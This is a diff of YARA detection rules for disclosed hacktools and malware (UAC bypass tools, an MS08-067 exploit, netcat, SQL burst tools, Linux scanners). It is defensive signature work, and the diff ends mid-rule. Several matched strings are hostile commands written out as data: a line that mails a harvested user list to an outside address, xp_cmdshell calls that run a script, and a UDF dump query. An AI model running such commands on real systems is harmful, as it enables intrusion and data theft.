-rule SIGNATURE_BASE_Wineggdropshellfinal_Zip_Folder_Injectt
+rule SIGNATURE_BASE_Ikat_Startbar
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
+		description = "Tool to hide unhide the windows startbar from command line - iKAT hack tools - file startbar.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "16f04551-050f-5a07-a35b-a3a7dbba6803"
-		date = "2014-11-23"
+		id = "f29f15e9-aa29-519a-b4ad-c018aac68fd6"
+		date = "2014-05-11"
 		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2622-L2639"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L899-L919"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "516e80e4a25660954de8c12313e2d7642bdb79dd"
-		logic_hash = "01840f4df12fbf6f5f27a3050c841002678605cd373e9ea9b182b2026caa29f9"
-		score = 60
+		hash = "0cac59b80b5427a8780168e1b85c540efffaf74f"
+		logic_hash = "adb29d4903a771b0dab9dee8313878757ff12fc014da86291e32eb3ec60bf551"
+		score = 50
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Packed by exe32pack" ascii
-		$s1 = "2TInject.Dll" fullword ascii
-		$s2 = "Windows Services" fullword ascii
-		$s3 = "Findrst6" fullword ascii
-		$s4 = "Press Any Key To Continue......" fullword ascii
+		$s2 = "Shinysoft Limited1" fullword ascii
+		$s3 = "Shinysoft Limited0" fullword ascii
+		$s4 = "Wellington1" fullword ascii
+		$s6 = "Wainuiomata1" fullword ascii
+		$s8 = "56 Wright St1" fullword ascii
+		$s9 = "UTN-USERFirst-Object" fullword ascii
+		$s10 = "New Zealand1" fullword ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Gina_Zip_Folder_Gina
+rule SIGNATURE_BASE_Ikat_Tool_Generic
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file gina.dll"
+		description = "Generic Rule for hack tool iKAT files gpdisable.exe, kitrap0d.exe, uacpoc.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7ebc7218-9c7b-5595-ae7b-f316fc99d1f6"
-		date = "2014-11-23"
+		id = "a8064a26-09c0-59f1-bdf9-628a445014ff"
+		date = "2014-05-11"
 		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2641-L2661"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L921-L947"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e0429e1b59989cbab6646ba905ac312710f5ed30"
-		logic_hash = "1344634346f9e7e3ef96c901705ac7bd4aa9a70cfbebf71c8222544e84ca9f98"
-		score = 60
+		logic_hash = "5c5aa2d7d82d4b65541c5b6bcae6260fdaed0030493ed689363722cd78fd0a26"
+		score = 55
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
+		hash1 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
+		hash2 = "b65a460d015fd94830d55e8eeaf6222321e12349"
 
 	strings:
-		$s0 = "NEWGINA.dll" fullword ascii
-		$s1 = "LOADER ERROR" fullword ascii
-		$s3 = "WlxActivateUserShell" fullword ascii
-		$s6 = "WlxWkstaLockedSAS" fullword ascii
-		$s13 = "WlxIsLockOk" fullword ascii
-		$s14 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
-		$s16 = "WlxShutdown" fullword ascii
-		$s17 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
+		$s0 = "<IconFile>C:\\WINDOWS\\App.ico</IconFile>" fullword
+		$s1 = "Failed to read the entire file" fullword
+		$s4 = "<VersionCreatedBy>14.4.0</VersionCreatedBy>" fullword
+		$s8 = "<ProgressCaption>Run &quot;executor.bat&quot; once the shell has spawned.</P"
+		$s9 = "Running Zip pipeline..." fullword
+		$s10 = "<FinTitle />" fullword
+		$s12 = "<AutoTemp>0</AutoTemp>" fullword
+		$s14 = "<DefaultDir>%TEMP%</DefaultDir>" fullword
+		$s15 = "AES Encrypting..." fullword
+		$s20 = "<UnzipDir>%TEMP%</UnzipDir>" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Superscan3_0
+rule SIGNATURE_BASE_Bypassuac2
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file superscan3.0.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d22aa3ae-4c62-5007-896d-7c473f0421a6"
-		date = "2014-11-23"
+		description = "Auto-generated rule - file BypassUac2.zip"
+		author = "yarGen Yara Rule Generator"
+		id = "8b7e49de-9b0a-5dc4-86af-1a854dc649cc"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2663-L2684"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L949-L961"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a9a02a14ea4e78af30b8b4a7e1c6ed500a36bc4d"
-		logic_hash = "448d3af61062c53c5b148e58697537bd98316e6c6d4d9ed9e0ff36cbd5a0b4f5"
-		score = 60
+		hash = "ef3e7dd2d1384ecec1a37254303959a43695df61"
+		logic_hash = "398783fa0453a60fd1c6aa64eacfbfa7c5385e81c79d1b6a8a8386dae9b825cc"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\scanner.ini" ascii
-		$s1 = "\\scanner.exe" ascii
-		$s2 = "\\scanner.lst" ascii
-		$s4 = "\\hensss.lst" ascii
-		$s5 = "STUB32.EXE" fullword wide
-		$s6 = "STUB.EXE" fullword wide
-		$s8 = "\\ws2check.exe" ascii
-		$s9 = "\\trojans.lst" ascii
-		$s10 = "1996 InstallShield Software Corporation" fullword wide
+		$s0 = "/BypassUac/BypassUac/BypassUac_Utils.cpp" fullword ascii
+		$s1 = "/BypassUac/BypassUacDll/BypassUacDll.aps" fullword ascii
+		$s3 = "/BypassUac/BypassUac/BypassUac.ico" fullword ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Sig_238_Xsniff
+rule SIGNATURE_BASE_Bypassuac_3
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file xsniff.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1e61a732-8691-5f84-beb0-c9f7e6d46538"
-		date = "2014-11-23"
+		description = "Auto-generated rule - file BypassUacDll.dll"
+		author = "yarGen Yara Rule Generator"
+		id = "407a8e12-1160-584d-94c8-7aa78e29c754"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2686-L2707"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L963-L976"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d61d7329ac74f66245a92c4505a327c85875c577"
-		logic_hash = "90c08db197a00885ffc62967bd814479a438f500316cf65e81fcec617517dd9c"
-		score = 60
-		quality = 85
+		hash = "1974aacd0ed987119999735cad8413031115ce35"
+		logic_hash = "cf3183ff4562f2962f87bc594c1710c73c113fa1d49fa56f7a3ff391ba4b9003"
+		score = 75
+		quality = 60
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
-		$s3 = "%s - simple sniffer for win2000" fullword ascii
-		$s4 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
-		$s5 = "HOST: %s USER: %s, PASS: %s" fullword ascii
-		$s7 = "http://www.xfocus.org" fullword ascii
-		$s9 = "  -pass        : Filter username/password" fullword ascii
-		$s18 = "  -udp         : Output udp packets" fullword ascii
-		$s19 = "Code by glacier <glacier@xfocus.org>" fullword ascii
-		$s20 = "  -tcp         : Output tcp packets" fullword ascii
+		$s0 = "BypassUacDLL.dll" fullword wide
+		$s1 = "\\Release\\BypassUacDll" ascii
+		$s3 = "Win7ElevateDLL" fullword wide
+		$s7 = "BypassUacDLL" fullword wide
 
 	condition:
-		6 of them
+		3 of them
 }
-rule SIGNATURE_BASE_Sig_238_Fscan
+rule SIGNATURE_BASE_Bypassuacdll_6
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file fscan.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7af4d38a-bc88-57ba-b602-4e01d3d95015"
-		date = "2014-11-23"
+		description = "Auto-generated rule - file BypassUacDll.aps"
+		author = "yarGen Yara Rule Generator"
+		id = "5be27053-446f-5ea3-a242-2661aeffa3df"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2709-L2730"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L994-L1005"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d5646e86b5257f9c83ea23eca3d86de336224e55"
-		logic_hash = "0af558345e8c85021fd4f8d399dacb3b6e8d9c692060c31a36e943fc48bfabff"
-		score = 60
+		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
+		logic_hash = "3cb89875ddf79a3709aeb58149e228e03b9fb43fa1565aab5ece743857b4cc71"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "FScan v1.12 - Command line port scanner." fullword ascii
-		$s2 = " -n    - no port scanning - only pinging (unless you use -q)" fullword ascii
-		$s5 = "Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200" fullword ascii
-		$s6 = " -z    - maximum simultaneous threads to use for scanning" fullword ascii
-		$s12 = "Failed to open the IP list file \"%s\"" fullword ascii
-		$s13 = "http://www.foundstone.com" fullword ascii
-		$s16 = " -p    - TCP port(s) to scan (a comma separated list of ports/ranges) " fullword ascii
-		$s18 = "Bind port number out of range. Using system default." fullword ascii
-		$s19 = "fscan.exe" fullword wide
+		$s3 = "BypassUacDLL.dll" fullword wide
+		$s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
 
 	condition:
-		4 of them
+		all of them
 }
-rule SIGNATURE_BASE__Iissample_Nesscan_Twwwscan
+rule SIGNATURE_BASE_Bypassuac_EXE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - from files iissample.exe, nesscan.exe, twwwscan.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a710ca8e-54dc-5a98-b173-c87b22af745f"
-		date = "2014-11-23"
+		description = "Auto-generated rule - file BypassUacDll.aps"
+		author = "yarGen Yara Rule Generator"
+		id = "b88aded5-7dfb-5cdf-bb42-cd8b069259e0"
+		date = "2016-02-15"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2732-L2758"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1007-L1021"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6088dd060507f4efa2f4c1770dc746100966e8a7475859918488d7be6c96bc31"
-		score = 60
-		quality = 85
+		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
+		logic_hash = "0283efd6866ed9417f2d255715f04c0ed6d7a89befce6a3a52c22ac06593c0bd"
+		score = 75
+		quality = 60
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "7f20962bbc6890bf48ee81de85d7d76a8464b862"
-		hash1 = "c0b1a2196e82eea4ca8b8c25c57ec88e4478c25b"
-		hash2 = "548f0d71ef6ffcc00c0b44367ec4b3bb0671d92f"
 
 	strings:
-		$s0 = "Connecting HTTP Port - Result: " fullword
-		$s1 = "No space for command line argument vector" fullword
-		$s3 = "Microsoft(July/1999~) http://www.microsoft.com/technet/security/current.asp" fullword
-		$s5 = "No space for copy of command line" fullword
-		$s7 = "-  Windows NT,2000 Patch Method  - " fullword
-		$s8 = "scanf : floating point formats not linked" fullword
-		$s12 = "hrdir_b.c: LoadLibrary != mmdll borlndmm failed" fullword
-		$s13 = "!\"what?\"" fullword
-		$s14 = "%s Port %d Closed" fullword
-		$s16 = "printf : floating point formats not linked" fullword
-		$s17 = "xxtype.cpp" fullword
+		$s1 = "Wole32.dll" wide
+		$s3 = "System32\\migwiz" wide
+		$s4 = "System32\\migwiz\\CRYPTBASE.dll" wide
+		$s5 = "Elevation:Administrator!new:" wide
+		$s6 = "BypassUac" wide
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE__Fshttp_Fspop_Fssniffer
+rule SIGNATURE_BASE_APT_Proxy_Malware_Packed_Dev
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - from files FsHttp.exe, FsPop.exe, FsSniffer.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5ca543af-2589-52b0-83f9-ad25ba76b633"
-		date = "2014-11-23"
+		description = "APT Malware - Proxy"
+		author = "FRoth"
+		id = "0b81b6c9-86fa-59c1-b58c-80310f6c0680"
+		date = "2014-11-10"
 		modified = "2025-12-18"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2760-L2786"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1023-L1037"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "50c91f1036ae467de51227b6782978c33607f94724d2e1b0af7c958028a84b48"
-		score = 60
+		hash = "6b6a86ceeab64a6cb273debfa82aec58"
+		logic_hash = "64b15aaf93b40744b887c75fa26f4996d72045a55ac82ab4de89a0d9a3714684"
+		score = 50
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "9d4e7611a328eb430a8bb6dc7832440713926f5f"
-		hash1 = "ae23522a3529d3313dd883727c341331a1fb1ab9"
-		hash2 = "7ffc496cd4a1017485dfb571329523a52c9032d8"
 
 	strings:
-		$s0 = "-ERR Invalid Command, Type [Help] For Command List" fullword
-		$s1 = "-ERR Get SMS Users ID Failed" fullword
-		$s2 = "Control Time Out 90 Secs, Connection Closed" fullword
-		$s3 = "-ERR Post SMS Failed" fullword
-		$s4 = "Current.hlt" fullword
-		$s6 = "Histroy.hlt" fullword
-		$s7 = "-ERR Send SMS Failed" fullword
-		$s12 = "-ERR Change Password <New Password>" fullword
-		$s17 = "+OK Send SMS Succussifully" fullword
-		$s18 = "+OK Set New Password: [%s]" fullword
-		$s19 = "CHANGE PASSWORD" fullword
+		$string0 = "PECompact2" fullword
+		$string1 = "[LordPE]"
+		$string2 = "steam_ker.dll"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Ammyy_Admin_AA_V3
+rule SIGNATURE_BASE_Tzddos_Ddos_Tool_CN
 {
 	meta:
-		description = "Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe"
+		description = "Disclosed hacktool set - file tzddos"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bb140cb7-9f56-5acb-883e-080dfd3f60d5"
-		date = "2014-12-22"
+		id = "bf2bfc7b-4db8-5d35-a312-2530a42985d5"
+		date = "2014-11-17"
 		modified = "2025-12-18"
-		reference = "http://goo.gl/gkAg2E"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2788-L2812"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1039-L1058"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6ab1de9f3b58cdb2c03f2d72986772333f8b81c98e6cbfd941f20b2fed1c5ff2"
-		score = 55
+		hash = "d4c517eda5458247edae59309453e0ae7d812f8e"
+		logic_hash = "fed09a8586f9b573e46871efa71082f4573d2bd069fde9cc2928b267d0025bab"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b130611c92788337c4f6bb9e9454ff06eb409166"
-		hash2 = "07539abb2623fe24b9a05e240f675fa2d15268cb"
 
 	strings:
-		$x1 = "S:\\Ammyy\\sources\\target\\TrService.cpp" fullword ascii
-		$x2 = "S:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cpp" fullword ascii
-		$x3 = "Global\\Ammyy.Target.IncomePort" fullword ascii
-		$x4 = "S:\\Ammyy\\sources\\target\\TrFmFileSys.cpp" fullword ascii
-		$x5 = "Please enter password for accessing remote computer" fullword ascii
-		$s1 = "CreateProcess1()#3 %d error=%d" fullword ascii
-		$s2 = "CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name." fullword ascii
-		$s3 = "ERROR: CreateProcessAsUser() error=%d, session=%d" fullword ascii
-		$s4 = "ERROR: FindProcessByName('explorer.exe')" fullword ascii
+		$s0 = "for /f %%a in (host.txt) do (" ascii
+		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
+		$s2 = "del host.txt /q" fullword ascii
+		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
+		$s4 = "start Http.exe %%a %http%" fullword ascii
+		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
+		$s6 = "del Result.txt s2.txt s1.txt " fullword ascii
 
 	condition:
-		2 of ( $x* ) or all of ( $s* )
+		all of them
 }
-rule SIGNATURE_BASE_Linuxhacktool_Eyes_Scanssh
+rule SIGNATURE_BASE_Ncat_Hacktools_CN
 {
 	meta:
-		description = "Linux hack tools - file scanssh"
+		description = "Disclosed hacktool set - file nc.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9546d0d8-42af-5b4c-ac93-195d14bfbb5b"
-		date = "2015-01-19"
+		id = "bdbfaf75-f8c0-508e-b6b1-9ddea179a325"
+		date = "2014-11-17"
 		modified = "2025-12-18"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2816-L2841"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1060-L1078"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "467398a6994e2c1a66a3d39859cde41f090623ad"
-		logic_hash = "cb20c28f1767ce23f60c377943d8a129fa069b1a1407bbaf43370f0ff79ade30"
-		score = 75
+		hash = "001c0c01c96fa56216159f83f6f298755366e528"
+		logic_hash = "0e059e90447747ed5259da4a870036d37d181c1cfea734ab25e760e81612f0f3"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Connection closed by remote host" fullword ascii
-		$s1 = "Writing packet : error on socket (or connection closed): %s" fullword ascii
-		$s2 = "Remote connection closed by signal SIG%s %s" fullword ascii
-		$s4 = "Reading private key %s failed (bad passphrase ?)" fullword ascii
-		$s5 = "Server closed connection" fullword ascii
-		$s6 = "%s: line %d: list delimiter not followed by keyword" fullword ascii
-		$s8 = "checking for version `%s' in file %s required by file %s" fullword ascii
-		$s9 = "Remote host closed connection" fullword ascii
-		$s10 = "%s: line %d: bad command `%s'" fullword ascii
-		$s13 = "verifying that server is a known host : file %s not found" fullword ascii
-		$s14 = "%s: line %d: expected service, found `%s'" fullword ascii
-		$s15 = "%s: line %d: list delimiter not followed by domain" fullword ascii
-		$s17 = "Public key from server (%s) doesn't match user preference (%s)" fullword ascii
+		$s0 = "nc -l -p port [options] [hostname] [port]" fullword ascii
+		$s2 = "nc [-options] hostname port[s] [ports] ... " fullword ascii
+		$s3 = "gethostpoop fuxored" fullword ascii
+		$s6 = "VERNOTSUPPORTED" fullword ascii
+		$s7 = "%s [%s] %d (%s)" fullword ascii
+		$s12 = " `--%s' doesn't allow an argument" fullword ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Linuxhacktool_Eyes_Pscan2
+rule SIGNATURE_BASE_MS08_067_Exploit_Hacktools_CN
 {
 	meta:
-		description = "Linux hack tools - file pscan2"
+		description = "Disclosed hacktool set - file cs.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "02d96766-6696-5410-ad48-bd8cb642ac51"
-		date = "2015-01-19"
+		id = "c15836c7-e739-5cc0-9d41-d651ea3e4738"
+		date = "2014-11-17"
 		modified = "2025-12-18"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2843-L2861"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1080-L1099"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "56b476cba702a4423a2d805a412cae8ef4330905"
-		logic_hash = "3686ccbd53a6dcedf9b10d131a1fc76b51b265328ad10f63671b64d4bf57a0b6"
-		score = 75
-		quality = 85
+		hash = "a3e9e0655447494253a1a60dbc763d9661181322"
+		logic_hash = "e5756250de401324d0c86f855bc088c8364e4a632cece25e553939fa621b73d8"
+		score = 60
+		quality = 60
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "# pscan completed in %u seconds. (found %d ips)" fullword ascii
-		$s1 = "Usage: %s <b-block> <port> [c-block]" fullword ascii
-		$s3 = "%s.%d.* (total: %d) (%.1f%% done)" fullword ascii
-		$s8 = "Invalid IP." fullword ascii
-		$s9 = "# scanning: " fullword ascii
-		$s10 = "Unable to allocate socket." fullword ascii
+		$s0 = "MS08-067 Exploit for CN by EMM@ph4nt0m.org" fullword ascii
+		$s3 = "Make SMB Connection error:%d" fullword ascii
+		$s5 = "Send Payload Over!" fullword ascii
+		$s7 = "Maybe Patched!" fullword ascii
+		$s8 = "RpcExceptionCode() = %u" fullword ascii
+		$s11 = "ph4nt0m" fullword wide
+		$s12 = "\\\\%s\\IPC" ascii
 
 	condition:
-		2 of them
+		4 of them
 }
-rule SIGNATURE_BASE_Linuxhacktool_Eyes_A
+rule SIGNATURE_BASE_Hacktools_CN_Burst_Sql
 {
 	meta:
-		description = "Linux hack tools - file a"
+		description = "Disclosed hacktool set - file sql.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2b4f52d4-b438-5040-89c5-aab1df15200e"
-		date = "2015-01-19"
+		id = "77ea95fc-7a6a-522b-8a72-1832598c4d2d"
+		date = "2014-11-17"
 		modified = "2025-12-18"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2863-L2881"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1101-L1122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "458ada1e37b90569b0b36afebba5ade337ea8695"
-		logic_hash = "a246eb907fd6525c96c911acde6b513fca68248ef8d4f8fa64039791942950ab"
-		score = 75
+		hash = "d5139b865e99b7a276af7ae11b14096adb928245"
+		logic_hash = "139f7308055351d9dc8a704c055360ac9408dcefc9eee4b9f222886fb5249b8c"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
-		$s1 = "mv scan.log bios.txt" fullword ascii
-		$s2 = "rm -rf bios.txt" fullword ascii
-		$s3 = "echo -e \"# by Eyes.\"" fullword ascii
-		$s4 = "././pscan2 $1 22" fullword ascii
-		$s10 = "echo \"#cautam...\"" fullword ascii
+		$s0 = "s.exe %s %s %s %s %d /save" fullword ascii
+		$s2 = "s.exe start error...%d" fullword ascii
+		$s4 = "EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'" fullword ascii
+		$s7 = "EXEC master..xp_cmdshell 'wscript.exe cc.js'" fullword ascii
+		$s10 = "Result.txt" fullword ascii
+		$s11 = "Usage:sql.exe [options]" fullword ascii
+		$s17 = "%s root %s %d error" fullword ascii
+		$s18 = "Pass.txt" fullword ascii
+		$s20 = "SELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_x" fullword ascii
 
 	condition:
-		2 of them
+		6 of them
 }
-rule SIGNATURE_BASE_Linuxhacktool_Eyes_Mass
+rule SIGNATURE_BASE_Hacktools_CN_Panda_445TOOL
 {
 	meta:
-		description = "Linux hack tools - file mass"
+		description = "Disclosed hacktool set - file 445TOOL.rar"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5da0c474-2dc8-5580-bf5c-d3f464225e4c"
-		date = "2015-01-19"
+		id = "02075631-49cc-5b97-ad8e-92d734a26d34"
+		date = "2014-11-17"
 		modified = "2025-12-18"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2883-L2900"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1124-L1140"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2054cb427daaca9e267b252307dad03830475f15"
-		logic_hash = "5bf17d1a8ae78681d2c3cba8511019ddf85e6d7a242900b56848521eef40ffc6"
-		score = 75
+		hash = "92050ba43029f914696289598cf3b18e34457a11"
+		logic_hash = "69a17bf7735eea946a5326d9535e68b8f010f2a0229875970b1bb15029c6dc4e"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
-		$s1 = "echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\r" ascii
-		$s3 = "killall -9 pscan2" fullword ascii
-		$s5 = "echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES}  [*]\"" fullword ascii
-		$s6 = "echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"" fullword ascii
+		$s0 = "scan.bat" fullword ascii
+		$s1 = "Http.exe" fullword ascii
+		$s2 = "GOGOGO.bat" fullword ascii
+		$s3 = "ip.txt" fullword ascii
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Linuxhacktool_Eyes_Pscan2_2
+rule SIGNATURE_BASE_Hacktools_CN_Panda_445
 {
 	meta:
-		description = "Linux hack tools - file pscan2.c"
+		description = "Disclosed hacktool set - file 445.rar"
 		author = "Florian Roth (Nextron Systems)"
